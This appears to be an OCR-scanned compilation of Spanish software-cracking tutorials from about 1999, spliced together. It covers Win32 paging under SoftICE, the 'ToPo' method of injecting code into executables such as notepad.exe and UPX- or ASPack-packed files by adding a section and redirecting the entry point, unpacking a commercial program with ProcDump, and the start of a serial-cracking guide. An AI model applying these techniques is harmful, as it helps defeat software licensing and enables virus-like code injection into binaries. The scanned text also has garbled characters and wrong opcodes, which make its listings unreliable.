Esta entrada contiene la dirección del marco de página en memoria física donde se encuentra instrucción indicada 
por la dirección virtual. 


Ahora obtengamos la dirección del marco de página: 


PEEK D 01EFF004 
Obtenemos un valor como 01DEC225h. Traduzcamos este valor a binario: 
0000 0001 1101 1110 1100 0010 0010 1001 


Los 20 bits altos de este valor son la dirección física de un marco de página, es decir, del comienzo de una página 
de memoria física. Si agregamos a este valor el valor indicado por los doce bits bajos de la dirección virtual 
obtenemos la dirección física donde se haya la instrucción señalada por la dirección virtual: 


0000 0001 1101 1110 1100 - 0000 0000 0000 


A A 


bytes altos en 0IDEC225h  - bytes bajos 
en dir virtual 


PEEK D 01DEC0000 


SICE devuelve 83EC8B55 


El valor devuelto por este comando corresponde a la instrucción en octal, pero invertido, a la que apunta la 
dirección virtual. Si esta es la dirección señalada por el puntero de SICE el siguiente comando nos devolverá el 
mismo valor regeresado antes: 


D EIP 


Vemos ahora que la ventana de datos de SICE apunta a 83EC8B535, en la dirección EIP, el mismo valor devuelto 
con el comando 'PEEK D 01DEC0000' 


Hagamos "code on" y veamos la correspondencia entre el valor desplegado por el último PEEK y el código en octal 
desplegado por SICE, que seguramente será el mismo pero invertido 


55 push ebp 
SBCE mov ebp, esp 
83... 


¿QUÉ VENTAJAS TIENE LA PAGINACIÓN? 


Las ventajas de la paginación son: 


Primero, las aplicaciones se aislan unas de otras. Ningún proceso puede inadvertidamente (o maliciosamente) 
escribir encima del espacio de código o datos de otro proceso, pues ni siquiera es capaz de direccionar la memoria 
del otro proceso sin el valor CR3 adecuado, y definir este valor es una tarea que sólo puede hacer el núcleo W32. 


Segundo, este mecanismo de paginación resuelve uno de los problemas más básicos en un entorno multitarea: la 
consolidación de la memoria libre. En un esquema de direccionamiento más simple, a medida que se ejecutan 
múltiples programas y se sale de ellos, la memoria se va fragmentando. Si la memoria está demasiado fragmentada, 
los programas no se pueden ejecutar porque no tienen suficiente memoria contigua, incluso aunque la cantidad total 
de memoria libre sea la adecuada. Con la paginación, no es necesario consolidar la memoria física libre porque las 
páginas no tienen que ser contiguas. Cualquier cosa se gestiona manipulando las tablas de página. La única pérdida 
viene realmente por el espacio perdido en las propias tablas de página y la granularidad de las páginas de 4 KB. 


Tercero, hay bits extra en las entradas de tabla de página de 32 bits además de las direcciones de 20 bits. Un bit 
indica que se ha accedido a una página particular (se denomina bit de «acceso»); otro que la página ha sido escrita 
(el bit «sucio»). W32 puede usar estos bits para determinar si una página de memoria se puede intercambiar 
(swapping) a un archivo de disco para obtener más memoria física libre. Otro bit («presencia») indica si la página 
se ha intercambiado al disco y se tiene que recargar en memoria. 


Otro bit («lectura/escritura») indica si la página se puede escribir. Este bit protege el código de los punteros 
errantes. Por ejemplo, si se incluye la instrucción en código C siguiente en un programa Windows: 


* (int *) WinMain 0; 


se obtendrá un cuadro de mensaje diciendo: «Este programa ha realizado una operación ilegal y se cerrará». Este bit 
no evita que un programa compile el código fuente del programa y almacene las instrucciones de lenguaje 
ensamblador en memoria para ser ejecutadas. 


Las direcciones virtuales tienen un ancho de 32 bits. El código y los datos (estáticos, de pila o localizados) de un 
programa tendrán direcciones entre 0x00000000 y Ox 7FFFFFFF. El propio W32 usa direcciones desde 0x80000000 
a OXFFFFFFFFE y aquí es donde se encontrarán los puntos de entrada a las librerías de enlace dinámico (DLL) de 
W32. 


La cantidad total de memoria libre está determinada por la cantidad de memoria física libre y el área libre de disco 
duro disponible para intercambio de páginas. Como es normal con la gestión de memoria virtual, W325 emplea un 
algoritmo LRU (Least-Recently Used: usado-menos-reciente 

mente) para determinar qué páginas intercambiar a disco. Los bits de «acceso» y «sucio» le ayudan en esta tarea. 
Las páginas de código no tienen que guardarse en disco porque las páginas de código no son escribíbles, 
simplemente se puede recargar desde el archivo .EXE o la librería de enlace dinámico (DLL). 


A veces, se verá que se accede al disco cuando se mueve el ratón desde el área cliente de un programa al área 
cliente de otro programa. ¿Por qué ocurre esto? Windows tiene que enviar mensajes de movimiento de ratón a la 
segunda aplicación. Si el código del programa para procesar este mensaje no está cargado actualmente en memoria, 
Windows tiene que recargarlo desde el archivo de disco. Si tiene varios programas Windows grandes cargados 
simultáneamente y no tiene mucha memoria, probablemente verá una actividad inusual en el disco duro a medida 
que se mueve de programa a programa, pues Windows está recargando páginas descargadas previamente. 


A veces, los programas individuales se ralentizan (o se detienen completamente) cuando Windows está realizando 
el intercambio (conmutación) de páginas. Las páginas de código se pueden compartir entre aplicaciones. 


Esto es particularmente útil para las librerías de enlace dinámico. Varios programas ejecután-dose a la vez pueden 
usar las mismas funciones Windows 93, sin que sea necesario que el mismo código se cargue en memoria varias 
veces. Sólo es necesario una copia del código. 


Excepto la granularidad de las páginas de 4 KB, la memoria física no se puede fragmentar porque la 
desfragmentación implica únicamente manipular las tablas de página. Sin embargo, la memoria virtual de una 
aplicación se puede fragmentar si una aplicación localiza, relocaliza y libera varios bloques de memoria. El limite 
de 2 MB para el código y los datos de una aplicación normalmente es suficiente para evitar problemas. Es mucho 
más fácil que un programa se quede antes sin memoria física que llegue a encontrar un límite en la memoria virtual. 
Pero puede ocurrir, y si tiene un programa donde este problema es concebible, puede que desee considerar la 
memoria «movible». 


¿EL PROGRAMADOR PUEDE GESTIONAR LA MEMORIA VIRTUAL? 


Sí, por supuesto. Para ello W32 proporciona varias funciones API: 


Esta función se emplea para reservar y comprometer espacio de memoria virtual: 


LPVOID VirtualAlloc (LPVOID IpAddress, DWORD cbsSize, 
DWORD fdwAllocationType, DWORD fdwProtec); 


Para liberar el espacio de memoria comprometido: 


BOOL VirtualFree (LPVOID IpAddress,SWORD cbSize,DWORD fdwFreeType); 


Bueno. Espero que este breve escrito sobre la gestión de memoria virtual en W32 pueda entenderse y sea de 
utilidad. 


Cualquier error u observación, por favor notifíquenme: 
nuMIT_orOiname.com 
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Introducción 


Los esquemas de protección de software pueden dividirse en dos grandes grupos. 
Los que se apoyan en dispositivos de hardware y los que lo hacen exclusivamente en 
el software. 

Los metodos soft pueden a su vez dividirse en aquellos en los que la limitación de la 
versión es condicional (Serial, fecha limite, numero de usos) y en los que es 
incondicional (opciones físicamente eliminadas del codigo) 


Salvo la elegante alternativa de los KeyMakers y los RegPatches, el resto de las 
desprotecciones exige que se realicen CAMBIOS en ficheros binarios, ya sean datos 
o instrucciones de codigo. 


Una regla de oro del crackista (que palabro!) consiste en que la modificación 
binaria propuesta debe PARCHEAR los contenidos existentes SIN AÑADIR un sólo 
byte. 

Bueno... en la inmensa mayoría de los casos esto no resulta un problema puesto que 
lo que se pretende es cambiar es: 


e el valor de un flag 
e una condición de bifurcacion 
e la ocurrencia de un CALL 


No sólo NO es un problema sino que además establece el alcance del RETO: 
"...sólo modificar en el fichero los bytes existentes y además en mínimo número...” 


Sin embargo, hay un "paquete" de situaciones en las que esta restricción se hace un 
tanto insoportable y que podría responder a la siguiente clasificación: 


e Empaquetados/Encriptados: el código NO está accesible en el fichero. 

e Reconstrucción de código no presente. 

e Emuladores de llave de hardware. 

e Adición de NUEVOS elementos a un programa sin tener el código fuente. 


Qué tienen en común estos casos? pues se me ocurren dos cosas: 


e Necesidad de un área "espaciosa" para escribir nuestro código añadido. 
e Necesidad de convivir en el mismo espacio de memoria del programa. 


Puede verse que esto trata de INGENIERÍA INVERSA en el aspecto más amplio y 
no sólo en lo que respecta al cracking. 
Pero cómo se consigue expandir el área de código de un programa en una forma 


segura y estable...? La respuesta tiene nombre de bicho: ToPo v1.0. 


> y 
nl 
ToPo: Arreglando el cuarto de invitados 


ToPo v1.0 es una utilidad que permite añadir a un ejecutable (o DLL) una extensión 
vacía para ser rellenada con código fresco. Podemos añadir típicamente una decena 
de estas "extensiones ortopédicas" dependiendo de la estructura interna del fichero. 
Entonces podremos hexeditar y añadir nuevas rutinas, parchear el código en 
memoria, reconstruir código incompleto, diseñar emuladores de dongle, trainers para 
juegos...y todo ello sin limitación de espacio! (- 10 Mb) 


El principio en que se basa la herramienta es muy simple. La estructura del formato 
PE (ejecutables y librerías Win32) consiste en una colección de cabeceras con 
multitud de datos (muchos no usados para nada). 


Entre las cabeceras más importantes están las llamadas cabeceras de sección. Son 
paquetes de 40 bytes donde se definen las características de los bloques de datos del 
programa (código, constantes, iconos, punteros, etc). 


La zona en que habitan estas cabeceras suele disponer de espacio libre para añadir 


del orden de 10 nuevas y nada impide que un programa tenga mas de una seccion de 
código (como ejemplo sirvan los empaquetadores en los que la rutina de 
desempaquetado suele alojarse en una sección propia). 


Así las cosas podemos DECLARAR una nueva sección del tamaño que nos 
apetezca y AÑADIRLA al final del fichero sin ningún tipo de problemas. El nuevo 
invitado tendrá un "segmento" de direcciones a las que (y desde las cuales) se podrá 
acceder al resto de la imagen del fichero en memoria. 


Reinventando los virus, MrCrimson? bueno cada cual es libre de inocular lo que le 
parezca... personalmente prefiero darle aplicaciones constructivas como el 
CrAcKiNg! 


VW 
ToPo: Bichos en el jardín 
t:* ToPo by MrCrimson¿[W'kT199] E 


Select file... 


je: ATempiMyFile.exe 


[Y Backup file 


Bytes to be added: I 00 FT Redirect Entrypoint 
TT” Make code writable 


Result: — 
100 bytes added at: Doll 


-memory address: D0409000h Help 


+ile offset: 00001400h Exi 
Exit 


Este es el cuadro de diálogo de la herramienta perforadora. El usuario solo tiene que 
seleccionar su fichero víctima (32 bits only, plz) e indicar cuantos bytes necesita 
para escribir su código. El click en "Do It!" informa acerca del éxito del resultado y 
de donde puede localizarse el nuevo inquilino (tanto en memoria como en fichero). 


Las opciones permiten: 


e Backup file: saludable copia de seguridad antes de inyectar el alien. 

e Redirect Entrypoint: Hace que el programa COMIENCE su ejecución en 
la nueva sección (".topo") al final de la cual se vuelve al inicio natural del 
programa. Esto nos permite realizar los cambios que sean necesarios en el 
código mapeado en memoria. 

e Make code writable: Permite que podamos escribir tranquilamente en el 


código principal. Necesario si vamos a parchear. 


Y con esto está todo dicho. Vamos a ver que se puede hacer en la práctica. 


VI 
Ejemplo (1): Adición de código nuevo 


Como víctima utilizaremos un programa del que todos disponemos: el bloc de notas 
(ejecutable: "notepad.exe" alojado en "Wwindows”). 

Vamos a añadir un trozo de código de 100 bytes con una llamada API. Para ello haz 
una copia en otro directorio y arranca ToPo v1.0: 


e selecciona: notepad.exe 
e tamaño a añadir: 100 bytes 


Seleccionar opciones: 


e Backup 
e Redirect entrypoint 


Una vez hecho se nos informa de que la nueva sección estará disponible en el offset 
de fichero x8A00h y si trazamos con Winice lo encontraremos a partir de la 
dirección :40C000. 

La opción "redirect entrypoint" ha cambiado el EntryPoint original :401000 (inicio 
de la sección ".code") por :40C000 (inicio de la sección ".topo"). Además, al final 
del bloque ha insertado un JMP 401000 de forma que despues de nuestros arreglos 
regresamos automaticamente a la ejecución natural del programa. 


Vamos a hacer que el NOTEPAD genere una especie de splash precaria esperando 
confirmación antes de arrancar. Todos conoceis ya la sintaxis de la función 
MessageBox: 


push Estilo 

push Titulo_ventana 

push Mensaje 

push Handle_ventana_Padre 
Call MessageBox 


Como estilo elegimos el más simple: un simple botón "OK" (valor 0) 
Como título pondré: "MrCrimson dice:" 

Como mensaje: "Tomando el control desde el principio" 

Nuestra ventana no tendra padre (sob!) con lo que el handle sera cero. 


Ahora, la forma más fácil de proceder consiste en arrancar Winice y con el comando 
AN 


comenzar a escribir el código en nuestra parcela. Cómo definimos las strings...? muy 
fácilmente: 


-Escribimos todas nuestras constantes y variables a partir del 3er byte. 
-Reservamos los dos(**) primeros bytes para un JMP que salte por encima de estas 
declaraciones. 


(*) el número exacto dependerá del tamaño de los datos). 
Por ejemplo: 


:40C000 ¡mp 40C005 
:40C002 686F6C6100 <---- "hola" (00 terminador de strings) 
:40C005 continua el codigo 


el offset :40C002 contiene la cadena "hola" y podemos usarlo como argumento en 
nuestras llamadas a función. De esta misma forma se definen variables y constantes 
en general (el segmento ".topo" tiene atributos de leible, escribible y ejecutable!). 


No os preocupeis si Winice o W32Dasm interpretan las variables así definidas como 
instrucciones de código inexistentes. Es normal. Intentan desensamblar lo 
inensamblable... 


Después escribimos los pushes, la llamada a MessageBox y dejamos el resto como 
está (una sucesión de NOPs hasta el JMP [original_entrypoint]. Copiamos con buena 
letra el código ensamblado resultante en un papelito y abandonamos Winice no sin 
antes haber borrado lo escrito restaurando los NOPs originales. 


Ahora hexeditamos (Uedit) el notepad.exe, nos vamos al offset donde comienza la 
sección ".topo" y tecleamos el churro de bytes. Cerramos y ejecutamos notepad 
obteniendo la ventana esperando confirmación para iniciar el "Bloc de Notas". 


En este ejemplo, el código añadido tiene este aspecto: 


[FAR ARIK KK KARA KK KAR Program Entry Point KKXXKXXXX* 
:0040C000 EB3B jmp 0040C03D ;--> 
salto hasta 


después de 


definir las 


"strings" 

¿Codigo inexistente... se trata de las strings: 
¿T=54h, o=6Fh, m=6Dh, a=61h, m=6Dh,...."Tomamos el 
Control” 

:0040C002 54 push esp 
:0040C003 6F outsd 


:0040C004 6D insd 


:0040C005 61 popad 


:0040C006 6D insd 

:0040C007 6F outsd 

:0040C008 7320 jnb 0040C02A 
:0040C00A 65 BYTE 065h 

:0040C00B 6€C insb 

:0040C00C 20636F and byte ptr [ebx+6F], 
ah 


; Una vez definidas las variables, comenza el código: 


:0040C03D 6A00 push 00000000 ; estilo 
0 

:0040C03F 682CC04000 push 0040C02C ; 
"MrCrimson says:" 

:0040C044 6802C04000 push 0040C002 ; 
"Tomamos el ctrl..." 

:0040C049 6A0O push 00000000 ; Padre 
0 


* Reference To: USER32.MessageBoxA 


:0040C04B FF1530744000 Call dword ptr 
[00407430] 

:0040C050 90 nop 

:0040C051 90 nop 

:0040C052 90 nop ; hasta 


completar 100 
:0040C05F E99C4FFFFF jmp 00401000 ; notepad 
normal 


La llamada a MessageBox parece un tanto misteriosa (offset :407430) pero los bytes 
que componen la instrucción pueden obtenerse fácilmente ensamblando desde 
Winice la linea: 


call dword ptr[MessageBoxA] 


NOTA: En la primera versión de este tute un descuido me llevo a codificar esta 
llamada mediante: 

[Winice (A)ssemble] call MessageBox 

El resultado era que funcionaba perfectamente en mi ordenador pero no en otros... 
Para que el enlace dinámico con la función en la dll (en este caso user32.dll) proceda 
correctamente, la llamada debe realizarse como se ha indicado. 


Una vez completado ejecutamos notepad y obtendremos una ventana con una mesaje 
chorra esperando un click en el OK para proseguir con el "bloc de notas". 


Este ejemplo ha mostrado como INCRUSTAR un trozo de código de -100 bytes 


donde aparentemente no cabría un alfiler. :0) 


ny 
Vi 
Ejemplo (2): Parcheador de Empaquetados Universal 


Por lo general, los empaquetadores/encriptadores de ficheros operan según una idea 
común. 

El código util está cifrado de manera que desensamblando no se puede analizar su 
comportamiento. En el momento de la ejecución entra en juego una rutina que 
escribe en memoria la versión no-encriptada y a partir de ese momento todo 
transcurre como si de un ejecutable normal se tratara. 

La forma de atacar a estos programas tan poco comunicativos se basa en cargadores 
o loaders. 

Un cargador es un programa capaz de cargar en memoria otros ejecutables y 
detenerse antes de comenzar su ejecución de manera que puede aprovecharse la 
ocasión para realizar los oportunos parcheos. Sin embargo son fáciles de engañar y 
tienen problemas para "seguir la pista" a nuevos threads (al menos los que he podido 
examinar). 


ToPo no tiene este tipo de problemas porque genera un "enemigo interior" que 
puede actuar justo después del desencriptado del código cualquiera que sea el 
algoritmo. Como ejemplo veremos como funciona con un par de empaquetadores de 
élite. 


(a) UPX v0.84 


Intentamos repetir la gracia anterior con una versión de Notepad.exe empaquetada 
con UPX. 
para ello tecleamos en la línea de comandos del DOS: 


C> upx -9 notepad.exe 
y ya está. Pfff....reducido a la mitad de tamaño!. Me encanta este packer :0) 


Ahora debemos añadir nuestra burbuja pero esta vez NO queremos redirección del 
entrypoint ya que este hace referencia al comienzo de la rutina de descompresión y 
no 

al código del notepad. 

Ok, tenemos el Notepad.exe, empaquetado con UPX e inoculado con una sección 
topo de 100 bytes (no necesitamos tantos en realidad...). Trazamos un poco para ver 
como respira el asunto poniendo un BPM en 401000 (el entrypoint original de 
notepad). Dejamos que fluya el código con E5 y... reaparecemos en :40C080. Se está 
escribiendo el código desempaquetado en su ubicación original... es decir que 
estamos en la rutina desempaquetadora. Trazamos un poco hacia el final para 
comprobar que la cosa acaba con un JMP al entrypoint del programa empaquetado 
(:401000). 

Esta rutina está perfectamente accesible por lo que desde UltraEdit modificamos el 
salto al inicio de nuestra sección ".topo" (JMP 40E000). 


A partir de aqui todo se reduce al caso anterior. Disponemos del código 
desempaquetado en memoria ANTES de comenzar la ejecución. Añadimos, como 
antes, nuestras "strings", los pushes y la llamada a messagebox (no copiar 
directamente porque las direcciones relativas no son las mismas). Por ultimo 
cerramos con un JMP al entrypoint de notepad :401000. 


(b) ASPack v1.08.03 


Este packer presenta algunas diferencias con el anterior. La compresión no es tan 
buena pero a cambio establece "potentes" medios de protección del código 
empaquetado. Siguiendo el ejmplo anterior intentaremos ejecutar nuestra lamer- 
splash al comienzo de la ejecución del notepad. 


Con las pautas ya explicadas (BPM a la primera instruccion del notepad, :401000) 
intentamos cazar el final de la rutina de descompresión para saltar desde allí a 
nuestra fortaleza de código en blanco. Y facilmente la encontramos en: 


:40C554 MOV [ESP+1C],EAX 

:40C558 POPAD 

:40C559 JNZ 40C563 

:40C55B MOV EAX, 1 

:40C560 RET 000€ 

:40C561 PUSH EAX 

:40C561 RET <------ Esto nos lleva al comienzo de 
"notepad" 


Cuando abrimos "notepad.exe” con Uedit para buscar este trozo de código 
descubrimos que NO ESTA. Impresionante. La rutina que desencripta esta también 
encriptada. 

No problemo. Buscaremos el código que desempaqueta al desempaquetador 
siguiendo la misma tecnica de los breakpoints en memoria. Así llegamos a: 


:40C0AE REPZ MOVSD 

:40C0B0 MOV ECX,EAX 

:40C0B2 AND ECX, 03 

:40C0B5 REPZ MOVSB <----- Copia el unpacker unpacked! 
:40C0B7 MOV EAX, [EBP+4450B5] 


Este código Sl esta accesible (bueno estaría que no) y perfectamente editable. 
Vamos pues con Uedit y modificamos la instrucción en :40C0b7 según: 


:40C0B7 JMP 40F000 <---salto a la sección ".topo" 


No debemos preocuparnos por las modificaciones que hacemos para acceder al 
".topo" porque antes de regresar restauraremos todo. 


Al comienzo del ".topo" codificamos lo siguiente (ayudandonos de (A)ssembly en 
Winice): 


¡Parcheamos el codigo en :40C554 por "3jmp 40f032" 
¡Es un salto a la mitad de la nueva sección donde 
¿pondremos nuestra messagebox 


:0040F000 mov dword ptr [0040C554], 002AD9E9 
:0040FO0OA mov byte ptr [0040C558], 00 


¡Restauramos el contenido en :40c0b7 a su 
¿código original "mov eax, [ebp+4450b5]" 


:0040F011 mov dword ptr [0040C0B7], 50B5858B 
:0040F01B mov word ptr [0040C0BB], 0044 


¿regresamos a :40c0b7 como si nada hubiera 
¡¿pasado... 


:0040F024 3jmp 0040C0B7 


Perdidos...? Recapitulemos: hemos parcheado con Uedit la rutina que desempaqueta 
al desempaquetador del codigo. El objeto del parche es establecer un acceso a 
"topo" que 

contendrá un nuevo parche en memoria. Este parche modifica el desempaquetador 
final para que salte de nuevo a ".topo" (hacia la mitad de la sección) ANTES de 
lanzar el Notepad. 

Creo que lo realmente lioso es intentar contarlo...hacerlo es muy fácil. 


La segunda mitad de ".topo" contiene el siguiente codigo más familiar: 


:0040F032 60 pushad ¿por 
seguridad 
:0040F033 EB3B jmp 0040F070 ¿saltamos 


las strings 


¿ strings usadas para la ventana messagebox 


:0040F035 54 push esp 

:0040F036 6F outsd 

:0040F037 6D insd 

:0040F069 7061 jo 0040FOCC 

:0040F06B 636B20 arpl dword ptr 
[ebx+20], ebp 

:0040F06E 2000 and byte ptr [eax], al 
:0040F070 6A00 push 00000000 ¡estilo 


0 


:0040F072 685FF04000 push 0040F05F ¡string 
titulo 


:0040F077 6835F04000 push 0040F035 ¿string 
mensaje 
:0040F07C 6A00 push 00000000 


¡Padre/Hwnd 


* Reference To: USER32.MessageBoxA 
:0040F07E FF1530744000 call dword ptr 
[00407430] 


¡¿Restauramos las instrucciones que habia antes del salto 
¡"40C554 mov [esp+1c],eax" 
¡"40C558 popad" 


:0040F084 C70554C540008944241C mov dword ptr 
[0040C554], 1C244489 


:0040F08E C60558C5400061 mov byte ptr 
[0040C558], 61 

:0040F095 61 popad 
:0040F096 E9BAD4FFFF jmp 0040C554 


Y así acaba esta historia. 
De manera muy similar se pueden parchear hasta la saciedad todos los 
packers/crypters. Al menos así ha sido con los que he probado. 


OS 
V 


La técnica ilustrada resuelve dos inconvenientes clásicos del Arte del Cracking. Por 
una parte la tradicional limitación de espacio que nos impide en ocasiones generar 
productos más creativos. Por otro lado se trata de una estrategia "en caliente" puesto 
que trabaja desde dentro del código como una parte más del programa original. 


Conclusión 


Como inconveniente citar el hecho de que cambia el tamaño de fichero y por tanto 
los clasicos parcheadores de diferencias no trabajarian con éxito. 
Un crack basado en esta técnica no sería un parcheador sino más bien un "inyector". 


Eso es todo por el momento. Este tutorial era originalmente más largo pero creo que 
con los ejemplos propuestos queda claro lo que se puede hacer con esta técnica. 
Espero que hayas pasado un buen rato leyendo este ladrillo. 


Los ejemplos de este tute están aquí (47kb): ejemplos.zip 
ToPo v1.0 esta disponible en http://i.am/MrCrimson 


Up The Hammer! 
MrCrimson/[WkT!99] 
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Como usar el ProcDump para 
descomprimir/desencriptar tus cobayas 
By Mr. Orange (1999) 


0) Introduccion. 

1) Herramientas necesarias. 
2) Un vistazo al Procdump. 
3) Descompresión manual. 
4) Añadir un Script. 

5) Nota final. 


0) Introduccion. 


La intencion de este manual es enseñar como descomprimir nuestro 
objetivo cuando no hay un descompresor para el (o por lo menos no lo 
tenemos). 

Nuestra cobaya va a ser el CuentaPasos v3.75. 


1) Herramientas Necesarias. 


o SoftICE 
o ProcDump (Yo he usado la versión 1.5 Build 0 > 


2) Un vistazo al Procdump. 


ProcDump es una herramienta que te permite (entre otras cosas) copiar 
el contenido de un proceso al disco duro. También te permite editar la 
cabecera de los programas de tipo PE (Portable Executable). 


Veamos entonces como funciona... 

La ventana principal tiene 2 listas y 7 botones. La primera lista 
contiene los procesos que estas ejecutando en este momento, mientras 
que la segunda contiene los modulos que estan asociados a cada 
proceso. Los botones son: 


Unpack: Descomprime un ejecutable. Procdump es capaz de 
descomprimir algunos compresores. 

Rebuild PE: Reconstruye la cabecera de un ejecutable. 

PE Editor: Esta claro, no? Te permite editar la cabecera de un 
ejecutable. 

Bhrama Server: Ejecuta el Servidor Bhrama. Esto premite 
que otro programa (llamado cliente) se aproveche de las 
magnificas cualidades del ProcDump. 

Options: Para modificar alguna opción del programa. 
About: Muestra información del ProcDump. 

Quit: Salir del programa. 


Para más información, leete los *.TXT que vienen con el ProcDump 


¿Que utilidad tienen las listas? 
En la lista de procesos podemos realizar 3 operaciones que son 
accesibles a traves del botón derecho del ratón: 


Dump (FULL): Copia todo el contenido del proceso al disco 
duro. 

Dump (PATIAL): Copia el contenido del proceso al disco 
duro (solamente un rango). 

Kill Task: Termina un proceso. 

Process Infos: Muestra la cabecera del ejecutable. 

Refresh List: Actualiza la lista. 


Mientras que en la lista de modulos las opciones disponibles son: 


0) 


0) 


Dump (FULL): Copia todo el contenido del modulo al disco 
duro. 
Dump (PATIAL): Copia el contenido del modulo al disco 


duro (solamente un rango). 


3) Descompresión manual. 


OK!! Empecemos por analizer el fichero. Para ello he utilizado la magnifica 
herramienta Gettyp, y los resultados son: 


-= [cpasos32.exe] 
DOS executable file -— 334562 bytes 
Portable executable 


Found no known modifier or compiler. 


Calculated entrypoint: 


0011440Ah) 


Required CPU type: 


8714 / 0000220Ah 


80386 


Requires Win 95 or NT 4 


Flags: 


File is executable 
Line numbers stripped from file 
Local symbols stripped from file 
32 bit word machine 


Linker version: 


Objects 
Name 
.Ttext 
. data 
.idata 
.ISrc 
Oreloc 


.reloc 


4.20 


(object align 


Virt size 
000BD200h 
00017CA4h 
00000400h 
00030C00h 
0000A600h 
0000640Ah 
000000DCh 


= 00001000h): 


RVA 
00001000h 
000BFO00h 
000D7000h 
000D8000h 
00109000h 
00114000h 
0011B000h 


Found 318690 bytes overlay 
Absolute position: 


15872 of 334562 
Found archive at position 898 in overlay 


Phys size 
000BD200h 
00000000h 
00000200h 
00001800h 
0000A600h 
00001E00h 
00000200h 


next detection level 


RKive 1.92 archive 
Don't know how to list this type of archive :-( 


(= 4. 


(starting at 128 for 334434 bytes) 


(RVA: 


Phys Ofs 

00000000h 
00000000h 
00000400h 
00000600h 
00000000h 
00001E00h 
00003C00h 


1%) 


Segun parece, nuestro amigo esta comprimido. Pues tiene un Overlay de 318690 
bytes, y si nos fijamos, el programa entero ocupa 334562 bytes. 


¿Que es lo que sabemos hasta ahora? 

Que nuestro amigo esta comprimido, pero no es posible que se ejecute el codigo en 
ese estado, por lo que se debe descomprimir en memoria y luego ejecutarse. Asi 
pues lo primero que se debe hacer el programa es descomprimir el codigo y luego 
ejecutarlo. 


Sabiendo esto, cargemos a nuestra cobaya en el SoftICE y pongamos un 
breackpoint al principio del codigo: 


0051440A ; Subrout ine 
0051440A public start 
0051440A start proc near 


0051440A ¿mp  005144B5 


005144B5 mov eax, lesptarg_0] 
005144B9 and eax, 0051441B 


005144BF call 00514835 <-— Rutina de descompresion 
005144C4 inc 005144B4 

005144CA mp eax <-- Salto al programa ya 
descomprimido 


005144CA start endp 


Bien, ahora ya sbemos que es lo que hace el programa, pero ¿Como vamos a 
descomprimirlo? 

Pues muy sencillo, vamos a ejecutar el programa paso a paso hasta la linea 
005144CA. Justo ahi vamos a modificar una lineas de codigo, esi que introduce el 
comando a (para ensamblar), y escribe la siguiente linea: ¡mp eip 

Esto provocara que el programa quede en un bucle infinito en la linea 005144CA. 
Ahora es cuando debemos de ir al ProcDump y pulsar con el boton derecho sobre 
nuestra cobaya y elegir la opción Dump (FULL), y lo guardamos con el nombre 
que queramos. 

Bien, ahora ya tenemos el CuentaPasos descomprimido. Veamoslo, ejecutemoslo y 
BOOOMMM!!!! El programa no funciona, ¿porque? La respuesta es bien sencilla. 
Nosotros tenemos el programa descomprimido, pero el punto de entrada todavia es 
el de la rutina de descompresión. Debemos de combiarlo para que apunte al 
principio del codigo ya descomprimido. 

Bien, pero ¿como sabemos cual debe ser el nuevo punto de entrada? La respuesta la 
tenemos en la linea 005144CA, ahi hay un JMP EAX. Por lo que en EAX tenemos 
lo que buscamos. Nos apuntamos el valor de EAX (en mi caso 00401228) y 
volemos al ProcDump. 


En esta Ocasión, vamos a utilizar la opcion PE Editor, con la que podemos editar 
la cabecera del ejecutable (alli entre otras cosas esta el punto de entrada), y 
seleccionamos el archivo que hemos creado. Nos aparecera una ventana como esta: 


PE Structure Editor | 


— Header nfos e Structures. Editar 


Entry Poit : [00114404 Sections | Directory | 


Size of image : fo01 32000 apply changes method: 
í* Only to PE header 


Image Base: [00400000 || TOPEfe Cancel | 


Debemos de fijarnos en los cuadros de texto de Image Base (IB) y Entry Point 
(EP). El programa empieza a ejecutarse en IB+EP, por lo que sabiendo esto nos 
resultara fácil modificar la cabecera para que apunte a 00401228. Tan solo debemos 
poner en Entry Point 00401228 - Image Base = 00001228. Asi que pongamos 
00001228 en Entry Point y pulsemos OK. Prueba a ejecutar ahora el programa!! 
Bien, Funciona. Ahora ya tenemos el CuentaPasos descomprimido. xDD 


4) Añadir un Script. 


Vamos a añadir un Script al ProcDump para que sea capaz de 
descomprimir el CuentaPasos, asi que editemos el fichero script.ini del 
ProcDump para añadir una nueva entrada: 


P1A=PCGUARD v2.10 

P1B=Aspack108.3 

P1C=Shrinker 3.4 

P1D=CuentaPasos v3.75 <-- Entrada añadida 


[CuentaPasos v3.75] 
L1=LOOK FF,EO0 
L2=BP 

L3=STEP 


Realmente es bastante sencillo lo que hace este Script: La primera 
linea busca la secuencia de bytes FFEO que corresponden a los 


opcodes de JMP EAX, luego ponemos un BreackPoint y ejecutamos el 
progama paso a paso para gaurdarlo al disco duro. 

Sencillo, no? ¿Que conseguimos con esto? Pues es probable que en la 
proxima versión el autor utilice el mismo compresor, y nosotros tan 
solo tendremos que ejecutar el script para descomprimirlo. xDD 


5) Nota final. 


Bueno, esto es todo por hoy. Pero no queria terminar este articulo sin 
deciros que este metodo de compresion es realente muy sencillo (Si lo 
intentamos descomprimir con el metodo estandar que viene con el 
ProcDump, tambien tendremos exito :)) ). Pero mi intención era 
enseñar como hacer esto mismo manualmente y luego añadir un 
pequeño Script al ProcDump para ser capaces de descomprimir otros 
programas que emplean el mismo compresor. 


PD: Recordad que muchos compresores utilizan trucos antidebug y 
tambien es posible encontrarse otros que incluyan codigo 
antiSoftICE... :)) 

Como quitar la protección VBOX que tiene el Ulead Button.Applet 1.0 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Winboost 2000 v1.0.0.1999 | W9S / W98 / NT 


Winboost 2000 es un interesante programa que te permitirá personalizar tu windows. 

Entre sus multiples opciones destacan los trucos tipicos y cantidad de chorradas varias 
Descripción pero muy útiles. Por ejemplo hacerte un acceso directo en el escritorio para apagar el 

pe con un doble click. 

Y todo esto en un plis-plas. 


MA Mae ia 

Url a 
A 
[| Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas [Gettyp v2.38, ProcDump v1.5, W32dasm v8.93, UltraEdit v6.10a. 
| Objetivo [Obtención de un número de Serie Válido. 
NN 


Introducción 


Vamos a ver la protección que utiliza, ya que es realmente lo que más me interesa de 
este programa. Newbies: Seguimos avanzando :0) 

Mr.WhiTe ha vuelto con otro interesante tutorial bajo el brazo. 

En esta ocasión vamos a aprender unas cuantas cosillas: 


1. Cómo saber si un programa esta comprimido 

2. Uso del ProcDump 

3. Cómo eliminar una "protección anti-desensamblado" 
4. Y por supuesto, cómo cazar un bonito serial 


Por último pero no menos importante aprenderemos lo que no se debe hacer 
